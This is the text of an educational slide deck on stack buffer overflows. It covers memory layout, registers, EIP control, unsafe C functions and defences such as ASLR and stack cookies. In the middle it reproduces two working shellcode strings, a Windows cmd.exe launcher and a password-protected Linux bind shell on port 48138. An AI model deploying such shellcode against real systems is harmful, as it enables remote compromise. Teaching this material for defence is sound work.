Buffer Overflows by: Saurabh Sharma

BUFFER

Buffer: The memory area where the user input is stored.

Overflow: The user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas.

Anatomy of Buffer Overflows

void get_input() { char buf[1024]; gets(buf); } void main(int argc, char*argv[]){ get_input(); } User controls the input. Malicious user can supply

the input of more than 500 chars. So what ?? User can supply a malicious input which can

execute some other exe. This can also be your cmd.exe and may lead to the system compromise.

A small example

Text: Contains instructions

Data: Contains initialized variables

BSS: Contains uninitialized global and static variables(initialized to 0)

Heap: Contains dynamic, uninitialized data(malloc())

Stack: Contains function arguments and local variables

Memory overview

Stack Frame:holds variables and data for function

Stack grows from higher memory location to lower memory location

Heap: lower to higher

Memory overview

General purpose: For basic calculations.

ESI, EDI: Used mostly with arrays

Flags: Outcome of several instructions set the flags

Segment: Code, stack, data.

EBP:Base pointer, points to the beginning of the current stack frame

ESP: Stack pointer, points to the top of the stack

EIP: Instruction pointer, points to the next instruction

REGISTERS

Stack is a LIFO data structure. Temporary memory, formed when the function called.

A new stack frame created when the function is called.

The return address is saved just above the local variables.

Stack Layout

parameters

Return addr(saved EIP)Saved EBP

Local variables

Stack grows

Higher address

Lower address

So, if the EIP can be controlled, the next instruction to be executed can be controlled.

Stack Layout

parameters

Return addr(saved EIP)Saved EBP

Local variables

Stack grows

Higher address

Lower address

Machine code which is injected into the overflown buffer

Does the work for you

WORK: executing a third program, adding an administrator etc.

SHELLCODE

win32/xp sp2 (En) cmd.exe 23 bytes Author : Mountassif Moad A.K.A :

"\x8b\xec\x68\x65\x78\x65" "\x20\x68\x63\x6d\x64\x2e" "\x8d\x45\xf8\x50\xb8\x8D" "\x15\x86\x7C\xff\xd0";

EXAMPLE SHELLCODES(SMALL)

BY NRAZIZ * * */ /* * Binds to port 48138 * Password: haxor */ char bindcode[]=

"\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" "\x31\xd2\x52\x66\x68\xbc\x0a\x66\x6a\x02\x89\xe2\x6a" "\x10\x52\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x6a" "\x02\x6a\x03\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xc9" "\x51\x51\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x31" "\xdb\x53\x6a\x3a\x68\x50\x61\x73\x73\x89\xe6\x6a\x05" "\x56\x6a\x04\x89\xe1\xb3\x09\xb0\x66\xcd\x80\x31\xc9" "\x31\xf6\x51\x6a\x05\x52\x6a\x04\x89\xe1\xb3\x0a\xb0" "\x66\xcd\x80\x31\xc9\x51\x6a\x72\x68\x68\x61\x78\x6f" "\x89\xe7\x89\xd6\x80\xc1\x05\xfc\xf3\xa6\x75\xbf\x31" "\xc9\xb3\x04\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0" "\x01\xcd\x80"

EXAMPLE SHELLCODES(bigger)

DEMO

strcpy() strcat() sprintf() scanf() sscanf() fscanf() vfscanf() vsprintf vscanf() vsscanf() streadd() strecpy() strtrns()

MAJOR SNARES

Buffer size must be checked Use alternative functions e.g. strncpy(dst,

src, dst_size-1) instead of strcpy(dst, src) Other protection mechanisms like /GS(stack

cookie), ASLR, SafeSEH compilation

PREVENTION

http://www.cccure.org/amazon/idssignature.pdf

http://www.shell-storm.org/papers/files/539.pdf

http://c0re.23.nu/~chris/data/bo-2004.pdf http://www-inst.eecs.berkeley.edu/~cs161/f

a08/papers/stack_smashing.pdf

REFERENCES

?????????????????

QUESTIONS